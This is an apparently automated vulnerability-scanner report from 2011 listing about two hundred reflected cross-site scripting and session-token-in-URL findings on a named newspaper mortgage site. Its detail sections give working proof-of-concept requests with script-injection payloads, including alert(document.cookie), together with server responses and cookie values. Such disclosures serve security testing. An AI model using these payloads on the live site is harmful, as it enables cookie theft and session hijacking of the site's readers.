XSS, mortgage.ocregister.com, Cross Site Scripting

XSS in mortgage.ocmortgage.com | Vulnerability Crawler Report

Report generated by CloudScan Vulnerability Crawler at Fri Feb 04 13:17:08 CST 2011.



DORK CWE-79 XSS Report

1. Cross-site scripting (reflected)

1.1. http://mortgage.ocregister.com/ [cat parameter]

1.2. http://mortgage.ocregister.com/ [name of an arbitrarily supplied request parameter]

1.3. http://mortgage.ocregister.com/2007/02/ [REST URL parameter 1]

1.4. http://mortgage.ocregister.com/2007/02/ [REST URL parameter 2]

1.5. http://mortgage.ocregister.com/2007/02/ [name of an arbitrarily supplied request parameter]

1.6. http://mortgage.ocregister.com/2007/03/ [REST URL parameter 1]

1.7. http://mortgage.ocregister.com/2007/03/ [REST URL parameter 2]

1.8. http://mortgage.ocregister.com/2007/03/ [name of an arbitrarily supplied request parameter]

1.9. http://mortgage.ocregister.com/2007/04/ [REST URL parameter 1]

1.10. http://mortgage.ocregister.com/2007/04/ [REST URL parameter 2]

1.11. http://mortgage.ocregister.com/2007/04/ [name of an arbitrarily supplied request parameter]

1.12. http://mortgage.ocregister.com/2007/05/ [REST URL parameter 1]

1.13. http://mortgage.ocregister.com/2007/05/ [REST URL parameter 2]

1.14. http://mortgage.ocregister.com/2007/05/ [name of an arbitrarily supplied request parameter]

1.15. http://mortgage.ocregister.com/2007/06/ [REST URL parameter 1]

1.16. http://mortgage.ocregister.com/2007/06/ [REST URL parameter 2]

1.17. http://mortgage.ocregister.com/2007/06/ [name of an arbitrarily supplied request parameter]

1.18. http://mortgage.ocregister.com/2007/07/ [REST URL parameter 1]

1.19. http://mortgage.ocregister.com/2007/07/ [REST URL parameter 2]

1.20. http://mortgage.ocregister.com/2007/07/ [name of an arbitrarily supplied request parameter]

1.21. http://mortgage.ocregister.com/2007/08/ [REST URL parameter 1]

1.22. http://mortgage.ocregister.com/2007/08/ [REST URL parameter 2]

1.23. http://mortgage.ocregister.com/2007/08/ [name of an arbitrarily supplied request parameter]

1.24. http://mortgage.ocregister.com/2007/09/ [REST URL parameter 1]

1.25. http://mortgage.ocregister.com/2007/09/ [REST URL parameter 2]

1.26. http://mortgage.ocregister.com/2007/09/ [name of an arbitrarily supplied request parameter]

1.27. http://mortgage.ocregister.com/2007/10/ [REST URL parameter 1]

1.28. http://mortgage.ocregister.com/2007/10/ [REST URL parameter 2]

1.29. http://mortgage.ocregister.com/2007/10/ [name of an arbitrarily supplied request parameter]

1.30. http://mortgage.ocregister.com/2007/11/ [REST URL parameter 1]

1.31. http://mortgage.ocregister.com/2007/11/ [REST URL parameter 2]

1.32. http://mortgage.ocregister.com/2007/11/ [name of an arbitrarily supplied request parameter]

1.33. http://mortgage.ocregister.com/2007/12/ [REST URL parameter 1]

1.34. http://mortgage.ocregister.com/2007/12/ [REST URL parameter 2]

1.35. http://mortgage.ocregister.com/2007/12/ [name of an arbitrarily supplied request parameter]

1.36. http://mortgage.ocregister.com/2008/01/ [REST URL parameter 1]

1.37. http://mortgage.ocregister.com/2008/01/ [REST URL parameter 2]

1.38. http://mortgage.ocregister.com/2008/01/ [name of an arbitrarily supplied request parameter]

1.39. http://mortgage.ocregister.com/2008/02/ [REST URL parameter 1]

1.40. http://mortgage.ocregister.com/2008/02/ [REST URL parameter 2]

1.41. http://mortgage.ocregister.com/2008/02/ [name of an arbitrarily supplied request parameter]

1.42. http://mortgage.ocregister.com/2008/03/ [REST URL parameter 1]

1.43. http://mortgage.ocregister.com/2008/03/ [REST URL parameter 2]

1.44. http://mortgage.ocregister.com/2008/03/ [name of an arbitrarily supplied request parameter]

1.45. http://mortgage.ocregister.com/2008/03/ [name of an arbitrarily supplied request parameter]

1.46. http://mortgage.ocregister.com/2008/04/ [REST URL parameter 1]

1.47. http://mortgage.ocregister.com/2008/04/ [REST URL parameter 2]

1.48. http://mortgage.ocregister.com/2008/04/ [name of an arbitrarily supplied request parameter]

1.49. http://mortgage.ocregister.com/2008/05/ [REST URL parameter 1]

1.50. http://mortgage.ocregister.com/2008/05/ [REST URL parameter 2]

1.51. http://mortgage.ocregister.com/2008/05/ [name of an arbitrarily supplied request parameter]

1.52. http://mortgage.ocregister.com/2008/06/ [REST URL parameter 1]

1.53. http://mortgage.ocregister.com/2008/06/ [REST URL parameter 2]

1.54. http://mortgage.ocregister.com/2008/06/ [name of an arbitrarily supplied request parameter]

1.55. http://mortgage.ocregister.com/2008/07/ [REST URL parameter 1]

1.56. http://mortgage.ocregister.com/2008/07/ [REST URL parameter 2]

1.57. http://mortgage.ocregister.com/2008/07/ [name of an arbitrarily supplied request parameter]

1.58. http://mortgage.ocregister.com/2008/08/ [REST URL parameter 1]

1.59. http://mortgage.ocregister.com/2008/08/ [REST URL parameter 2]

1.60. http://mortgage.ocregister.com/2008/08/ [name of an arbitrarily supplied request parameter]

1.61. http://mortgage.ocregister.com/2008/08/ [name of an arbitrarily supplied request parameter]

1.62. http://mortgage.ocregister.com/2008/09/ [REST URL parameter 1]

1.63. http://mortgage.ocregister.com/2008/09/ [REST URL parameter 2]

1.64. http://mortgage.ocregister.com/2008/09/ [name of an arbitrarily supplied request parameter]

1.65. http://mortgage.ocregister.com/2008/09/ [name of an arbitrarily supplied request parameter]

1.66. http://mortgage.ocregister.com/2008/10/ [REST URL parameter 1]

1.67. http://mortgage.ocregister.com/2008/10/ [REST URL parameter 2]

1.68. http://mortgage.ocregister.com/2008/10/ [name of an arbitrarily supplied request parameter]

1.69. http://mortgage.ocregister.com/2008/11/ [REST URL parameter 1]

1.70. http://mortgage.ocregister.com/2008/11/ [REST URL parameter 2]

1.71. http://mortgage.ocregister.com/2008/11/ [name of an arbitrarily supplied request parameter]

1.72. http://mortgage.ocregister.com/2008/12/ [REST URL parameter 1]

1.73. http://mortgage.ocregister.com/2008/12/ [REST URL parameter 2]

1.74. http://mortgage.ocregister.com/2008/12/ [name of an arbitrarily supplied request parameter]

1.75. http://mortgage.ocregister.com/2009/01/ [REST URL parameter 1]

1.76. http://mortgage.ocregister.com/2009/01/ [REST URL parameter 2]

1.77. http://mortgage.ocregister.com/2009/01/ [name of an arbitrarily supplied request parameter]

1.78. http://mortgage.ocregister.com/2009/02/ [REST URL parameter 1]

1.79. http://mortgage.ocregister.com/2009/02/ [REST URL parameter 2]

1.80. http://mortgage.ocregister.com/2009/02/ [name of an arbitrarily supplied request parameter]

1.81. http://mortgage.ocregister.com/2009/03/ [REST URL parameter 1]

1.82. http://mortgage.ocregister.com/2009/03/ [REST URL parameter 2]

1.83. http://mortgage.ocregister.com/2009/03/ [name of an arbitrarily supplied request parameter]

1.84. http://mortgage.ocregister.com/2009/04/ [REST URL parameter 1]

1.85. http://mortgage.ocregister.com/2009/04/ [REST URL parameter 2]

1.86. http://mortgage.ocregister.com/2009/04/ [name of an arbitrarily supplied request parameter]

1.87. http://mortgage.ocregister.com/2009/05/ [REST URL parameter 1]

1.88. http://mortgage.ocregister.com/2009/05/ [REST URL parameter 2]

1.89. http://mortgage.ocregister.com/2009/05/ [name of an arbitrarily supplied request parameter]

1.90. http://mortgage.ocregister.com/2009/06/ [REST URL parameter 1]

1.91. http://mortgage.ocregister.com/2009/06/ [REST URL parameter 2]

1.92. http://mortgage.ocregister.com/2009/06/ [name of an arbitrarily supplied request parameter]

1.93. http://mortgage.ocregister.com/2009/07/ [REST URL parameter 1]

1.94. http://mortgage.ocregister.com/2009/07/ [REST URL parameter 2]

1.95. http://mortgage.ocregister.com/2009/07/ [name of an arbitrarily supplied request parameter]

1.96. http://mortgage.ocregister.com/2009/08/ [REST URL parameter 1]

1.97. http://mortgage.ocregister.com/2009/08/ [REST URL parameter 2]

1.98. http://mortgage.ocregister.com/2009/08/ [name of an arbitrarily supplied request parameter]

1.99. http://mortgage.ocregister.com/2009/09/ [REST URL parameter 1]

1.100. http://mortgage.ocregister.com/2009/09/ [REST URL parameter 2]

1.101. http://mortgage.ocregister.com/2009/09/ [name of an arbitrarily supplied request parameter]

1.102. http://mortgage.ocregister.com/2009/10/ [REST URL parameter 1]

1.103. http://mortgage.ocregister.com/2009/10/ [REST URL parameter 2]

1.104. http://mortgage.ocregister.com/2009/10/ [name of an arbitrarily supplied request parameter]

1.105. http://mortgage.ocregister.com/2009/11/ [REST URL parameter 1]

1.106. http://mortgage.ocregister.com/2009/11/ [REST URL parameter 2]

1.107. http://mortgage.ocregister.com/2009/11/ [name of an arbitrarily supplied request parameter]

1.108. http://mortgage.ocregister.com/2009/12/ [REST URL parameter 1]

1.109. http://mortgage.ocregister.com/2009/12/ [REST URL parameter 2]

1.110. http://mortgage.ocregister.com/2009/12/ [name of an arbitrarily supplied request parameter]

1.111. http://mortgage.ocregister.com/2010/01/ [REST URL parameter 1]

1.112. http://mortgage.ocregister.com/2010/01/ [REST URL parameter 2]

1.113. http://mortgage.ocregister.com/2010/01/ [name of an arbitrarily supplied request parameter]

1.114. http://mortgage.ocregister.com/2010/02/ [REST URL parameter 1]

1.115. http://mortgage.ocregister.com/2010/02/ [REST URL parameter 2]

1.116. http://mortgage.ocregister.com/2010/02/ [name of an arbitrarily supplied request parameter]

1.117. http://mortgage.ocregister.com/2010/03/ [REST URL parameter 1]

1.118. http://mortgage.ocregister.com/2010/03/ [REST URL parameter 2]

1.119. http://mortgage.ocregister.com/2010/03/ [name of an arbitrarily supplied request parameter]

1.120. http://mortgage.ocregister.com/2010/04/ [REST URL parameter 1]

1.121. http://mortgage.ocregister.com/2010/04/ [REST URL parameter 2]

1.122. http://mortgage.ocregister.com/2010/04/ [name of an arbitrarily supplied request parameter]

1.123. http://mortgage.ocregister.com/2010/05/ [REST URL parameter 1]

1.124. http://mortgage.ocregister.com/2010/05/ [REST URL parameter 2]

1.125. http://mortgage.ocregister.com/2010/05/ [name of an arbitrarily supplied request parameter]

1.126. http://mortgage.ocregister.com/2010/06/ [REST URL parameter 1]

1.127. http://mortgage.ocregister.com/2010/06/ [REST URL parameter 2]

1.128. http://mortgage.ocregister.com/2010/06/ [name of an arbitrarily supplied request parameter]

1.129. http://mortgage.ocregister.com/2010/07/ [REST URL parameter 1]

1.130. http://mortgage.ocregister.com/2010/07/ [REST URL parameter 2]

1.131. http://mortgage.ocregister.com/2010/07/ [name of an arbitrarily supplied request parameter]

1.132. http://mortgage.ocregister.com/2010/08/ [REST URL parameter 1]

1.133. http://mortgage.ocregister.com/2010/08/ [REST URL parameter 2]

1.134. http://mortgage.ocregister.com/2010/08/ [name of an arbitrarily supplied request parameter]

1.135. http://mortgage.ocregister.com/2010/09/ [REST URL parameter 1]

1.136. http://mortgage.ocregister.com/2010/09/ [REST URL parameter 2]

1.137. http://mortgage.ocregister.com/2010/09/ [name of an arbitrarily supplied request parameter]

1.138. http://mortgage.ocregister.com/2010/10/ [REST URL parameter 1]

1.139. http://mortgage.ocregister.com/2010/10/ [REST URL parameter 2]

1.140. http://mortgage.ocregister.com/2010/10/ [name of an arbitrarily supplied request parameter]

1.141. http://mortgage.ocregister.com/2010/11/ [REST URL parameter 1]

1.142. http://mortgage.ocregister.com/2010/11/ [REST URL parameter 2]

1.143. http://mortgage.ocregister.com/2010/11/ [name of an arbitrarily supplied request parameter]

1.144. http://mortgage.ocregister.com/2010/12/ [REST URL parameter 1]

1.145. http://mortgage.ocregister.com/2010/12/ [REST URL parameter 2]

1.146. http://mortgage.ocregister.com/2010/12/ [name of an arbitrarily supplied request parameter]

1.147. http://mortgage.ocregister.com/2011/01/ [REST URL parameter 1]

1.148. http://mortgage.ocregister.com/2011/01/ [REST URL parameter 2]

1.149. http://mortgage.ocregister.com/2011/01/ [name of an arbitrarily supplied request parameter]

1.150. http://mortgage.ocregister.com/2011/01/08/upside-down-but-still-on-a-good-path/41162/ [REST URL parameter 5]

1.151. http://mortgage.ocregister.com/2011/01/08/upside-down-but-still-on-a-good-path/41162/ [name of an arbitrarily supplied request parameter]

1.152. http://mortgage.ocregister.com/2011/01/13/late-o-c-mortgage-payments-drop/41334/ [REST URL parameter 5]

1.153. http://mortgage.ocregister.com/2011/01/13/late-o-c-mortgage-payments-drop/41334/ [name of an arbitrarily supplied request parameter]

1.154. http://mortgage.ocregister.com/2011/01/14/ca-foreclosure-starts-fall-but-more-auctions-set/41340/ [REST URL parameter 5]

1.155. http://mortgage.ocregister.com/2011/01/14/ca-foreclosure-starts-fall-but-more-auctions-set/41340/ [name of an arbitrarily supplied request parameter]

1.156. http://mortgage.ocregister.com/2011/01/14/newport-home-in-squatters-case-set-for-auction/41384/ [REST URL parameter 5]

1.157. http://mortgage.ocregister.com/2011/01/14/newport-home-in-squatters-case-set-for-auction/41384/ [name of an arbitrarily supplied request parameter]

1.158. http://mortgage.ocregister.com/2011/01/15/poor-lender-service-dont-hold-your-breath-for-a-refund/41318/ [REST URL parameter 5]

1.159. http://mortgage.ocregister.com/2011/01/15/poor-lender-service-dont-hold-your-breath-for-a-refund/41318/ [name of an arbitrarily supplied request parameter]

1.160. http://mortgage.ocregister.com/2011/01/25/foreclosures-down-31-in-state/41514/ [REST URL parameter 5]

1.161. http://mortgage.ocregister.com/2011/01/25/foreclosures-down-31-in-state/41514/ [name of an arbitrarily supplied request parameter]

1.162. http://mortgage.ocregister.com/2011/01/26/7900-o-c-homes-seized-in-2010/41532/ [REST URL parameter 5]

1.163. http://mortgage.ocregister.com/2011/01/26/7900-o-c-homes-seized-in-2010/41532/ [name of an arbitrarily supplied request parameter]

1.164. http://mortgage.ocregister.com/2011/01/29/3-5-million-irvine-foreclosure-hits-market/41590/ [REST URL parameter 5]

1.165. http://mortgage.ocregister.com/2011/01/29/3-5-million-irvine-foreclosure-hits-market/41590/ [name of an arbitrarily supplied request parameter]

1.166. http://mortgage.ocregister.com/2011/01/29/couple-might-be-better-off-with-short-sale/41502/ [REST URL parameter 5]

1.167. http://mortgage.ocregister.com/2011/01/29/couple-might-be-better-off-with-short-sale/41502/ [name of an arbitrarily supplied request parameter]

1.168. http://mortgage.ocregister.com/2011/02/ [REST URL parameter 1]

1.169. http://mortgage.ocregister.com/2011/02/ [REST URL parameter 2]

1.170. http://mortgage.ocregister.com/2011/02/ [name of an arbitrarily supplied request parameter]

1.171. http://mortgage.ocregister.com/2011/02/02/predatory-lending-suit-settles-for-6-5-million/41668/ [REST URL parameter 5]

1.172. http://mortgage.ocregister.com/2011/02/02/predatory-lending-suit-settles-for-6-5-million/41668/ [name of an arbitrarily supplied request parameter]

1.173. http://mortgage.ocregister.com/44146092a8373b49c062f68d9825aa14.css [REST URL parameter 1]

1.174. http://mortgage.ocregister.com/css/print.css [REST URL parameter 1]

1.175. http://mortgage.ocregister.com/css/print.css [REST URL parameter 2]

1.176. http://mortgage.ocregister.com/feed/ [REST URL parameter 1]

1.177. http://mortgage.ocregister.com/feeda71cd">1f35e8c0ea2/feed/ [REST URL parameter 3]

1.181. http://mortgage.ocregister.com/feeda71cd%2522%253E%253Cscript%253Ealert(1 [REST URL parameter 1]

1.182. http://mortgage.ocregister.com/feeda71cd%2522%253E%253Cscript%253Ealert(1 [name of an arbitrarily supplied request parameter]

1.183. http://mortgage.ocregister.com/feeda71cd%2522%253E%253Cscript%253Ealert(document.cookie [REST URL parameter 1]

1.184. http://mortgage.ocregister.com/feeda71cd%2522%253E%253Cscript%253Ealert(document.cookie [name of an arbitrarily supplied request parameter]

1.185. http://mortgage.ocregister.com/files [REST URL parameter 1]

1.186. http://mortgage.ocregister.com/files [name of an arbitrarily supplied request parameter]

1.187. http://mortgage.ocregister.com/ver1.0/Content/dmhotlinks.css [REST URL parameter 1]

1.188. http://mortgage.ocregister.com/ver1.0/Content/dmhotlinks.css [REST URL parameter 2]

1.189. http://mortgage.ocregister.com/ver1.0/Content/dmhotlinks.css [REST URL parameter 3]

1.190. http://mortgage.ocregister.com/wp-content/plugins/democracy/basic.css [REST URL parameter 1]

1.191. http://mortgage.ocregister.com/wp-content/plugins/democracy/democracy.js [REST URL parameter 1]

1.192. http://mortgage.ocregister.com/wp-content/plugins/democracy/style.css [REST URL parameter 1]

1.193. http://mortgage.ocregister.com/wp-content/themes/onSet/style.css [REST URL parameter 1]

1.194. http://mortgage.ocregister.com/wp-includes/js/swfobject.js [REST URL parameter 1]

1.195. http://mortgage.ocregister.com/wp-includes/wlwmanifest.xml [REST URL parameter 1]

1.196. http://mortgage.ocregister.com/xmlrpc.php [REST URL parameter 1]

2. Session token in URL

2.1. http://mortgage.ocregister.com/

2.2. http://mortgage.ocregister.com/2007/02/

2.3. http://mortgage.ocregister.com/2007/03/

2.4. http://mortgage.ocregister.com/2007/04/

2.5. http://mortgage.ocregister.com/2007/05/

2.6. http://mortgage.ocregister.com/2007/06/

2.7. http://mortgage.ocregister.com/2007/07/

2.8. http://mortgage.ocregister.com/2007/08/

2.9. http://mortgage.ocregister.com/2007/09/

2.10. http://mortgage.ocregister.com/2007/10/

2.11. http://mortgage.ocregister.com/2007/11/

2.12. http://mortgage.ocregister.com/2007/12/

2.13. http://mortgage.ocregister.com/2008/01/

2.14. http://mortgage.ocregister.com/2008/02/

2.15. http://mortgage.ocregister.com/2008/03/

2.16. http://mortgage.ocregister.com/2008/04/

2.17. http://mortgage.ocregister.com/2008/05/

2.18. http://mortgage.ocregister.com/2008/06/

2.19. http://mortgage.ocregister.com/2008/07/

2.20. http://mortgage.ocregister.com/2008/08/

2.21. http://mortgage.ocregister.com/2008/09/

2.22. http://mortgage.ocregister.com/2008/10/

2.23. http://mortgage.ocregister.com/2008/11/

2.24. http://mortgage.ocregister.com/2008/12/

2.25. http://mortgage.ocregister.com/2009/01/

2.26. http://mortgage.ocregister.com/2009/02/

2.27. http://mortgage.ocregister.com/2009/03/

2.28. http://mortgage.ocregister.com/2009/04/

2.29. http://mortgage.ocregister.com/2009/05/

2.30. http://mortgage.ocregister.com/2009/06/

2.31. http://mortgage.ocregister.com/2009/07/

2.32. http://mortgage.ocregister.com/2009/08/

2.33. http://mortgage.ocregister.com/2009/09/

2.34. http://mortgage.ocregister.com/2009/10/

2.35. http://mortgage.ocregister.com/2009/11/

2.36. http://mortgage.ocregister.com/2009/12/

2.37. http://mortgage.ocregister.com/2010/01/

2.38. http://mortgage.ocregister.com/2010/02/

2.39. http://mortgage.ocregister.com/2010/03/

2.40. http://mortgage.ocregister.com/2010/04/

2.41. http://mortgage.ocregister.com/2010/05/

2.42. http://mortgage.ocregister.com/2010/06/

2.43. http://mortgage.ocregister.com/2010/07/

2.44. http://mortgage.ocregister.com/2010/08/

2.45. http://mortgage.ocregister.com/2010/09/

2.46. http://mortgage.ocregister.com/2010/10/

2.47. http://mortgage.ocregister.com/2010/11/

2.48. http://mortgage.ocregister.com/2010/12/

2.49. http://mortgage.ocregister.com/2011/01/

2.50. http://mortgage.ocregister.com/2011/01/08/upside-down-but-still-on-a-good-path/41162/

2.51. http://mortgage.ocregister.com/2011/01/13/late-o-c-mortgage-payments-drop/41334/

2.52. http://mortgage.ocregister.com/2011/01/14/ca-foreclosure-starts-fall-but-more-auctions-set/41340/

2.53. http://mortgage.ocregister.com/2011/01/14/newport-home-in-squatters-case-set-for-auction/41384/

2.54. http://mortgage.ocregister.com/2011/01/15/poor-lender-service-dont-hold-your-breath-for-a-refund/41318/

2.55. http://mortgage.ocregister.com/2011/01/25/foreclosures-down-31-in-state/41514/

2.56. http://mortgage.ocregister.com/2011/01/26/7900-o-c-homes-seized-in-2010/41532/

2.57. http://mortgage.ocregister.com/2011/01/29/3-5-million-irvine-foreclosure-hits-market/41590/

2.58. http://mortgage.ocregister.com/2011/01/29/couple-might-be-better-off-with-short-sale/41502/

2.59. http://mortgage.ocregister.com/2011/02/

2.60. http://mortgage.ocregister.com/2011/02/02/predatory-lending-suit-settles-for-6-5-million/41668/

2.61. http://mortgage.ocregister.com/feeda71cd">1f35e8c0ea2/feed/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /feeda71cd"><script>alert(document.cookie)</script>1f35e8c0ea2/feed/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5b243<script>alert(1)</script>b89f925ed73 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /feeda71cd"><script>alert(document.cookie)</script>1f35e8c0ea2/feed5b243<script>alert(1)</script>b89f925ed73/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:07:56 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:07:56 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62675

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</script>1f35e8c0ea2/feed5b243<script>alert(1)</script>b89f925ed73/feed/" />
...[SNIP]...

1.181. http://mortgage.ocregister.com/feeda71cd%2522%253E%253Cscript%253Ealert(1 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /feeda71cd%2522%253E%253Cscript%253Ealert(1

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a614"><script>alert(1)</script>e492f5d219d was submitted in the REST URL parameter 1. This input was echoed as 4a614\"><script>alert(1)</script>e492f5d219d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /feeda71cd%2522%253E%253Cscript%253Ealert(14a614"><script>alert(1)</script>e492f5d219d HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:08:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:08:18 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62652

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/feeda71cd%2522%253E%253Cscript%253Ealert(14a614\"><script>alert(1)</script>e492f5d219dfeed/" />
...[SNIP]...

1.182. http://mortgage.ocregister.com/feeda71cd%2522%253E%253Cscript%253Ealert(1 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /feeda71cd%2522%253E%253Cscript%253Ealert(1

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee1f2"><script>alert(1)</script>14894bf18ef was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ee1f2\"><script>alert(1)</script>14894bf18ef in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /feeda71cd%2522%253E%253Cscript%253Ealert(1?ee1f2"><script>alert(1)</script>14894bf18ef=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:08:13 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:08:13 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62689

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/feeda71cd%2522%253E%253Cscript%253Ealert(1?ee1f2\"><script>alert(1)</script>14894bf18ef=1feed/" />
...[SNIP]...

1.183. http://mortgage.ocregister.com/feeda71cd%2522%253E%253Cscript%253Ealert(document.cookie [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /feeda71cd%2522%253E%253Cscript%253Ealert(document.cookie

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2efa0"><script>alert(1)</script>c5d2576f89d was submitted in the REST URL parameter 1. This input was echoed as 2efa0\"><script>alert(1)</script>c5d2576f89d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /feeda71cd%2522%253E%253Cscript%253Ealert(document.cookie2efa0"><script>alert(1)</script>c5d2576f89d HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:51 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62702

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/feeda71cd%2522%253E%253Cscript%253Ealert(document.cookie2efa0\"><script>alert(1)</script>c5d2576f89dfeed/" />
...[SNIP]...

1.184. http://mortgage.ocregister.com/feeda71cd%2522%253E%253Cscript%253Ealert(document.cookie [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /feeda71cd%2522%253E%253Cscript%253Ealert(document.cookie

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19724"><script>alert(1)</script>5a15440a445 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 19724\"><script>alert(1)</script>5a15440a445 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /feeda71cd%2522%253E%253Cscript%253Ealert(document.cookie?19724"><script>alert(1)</script>5a15440a445=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
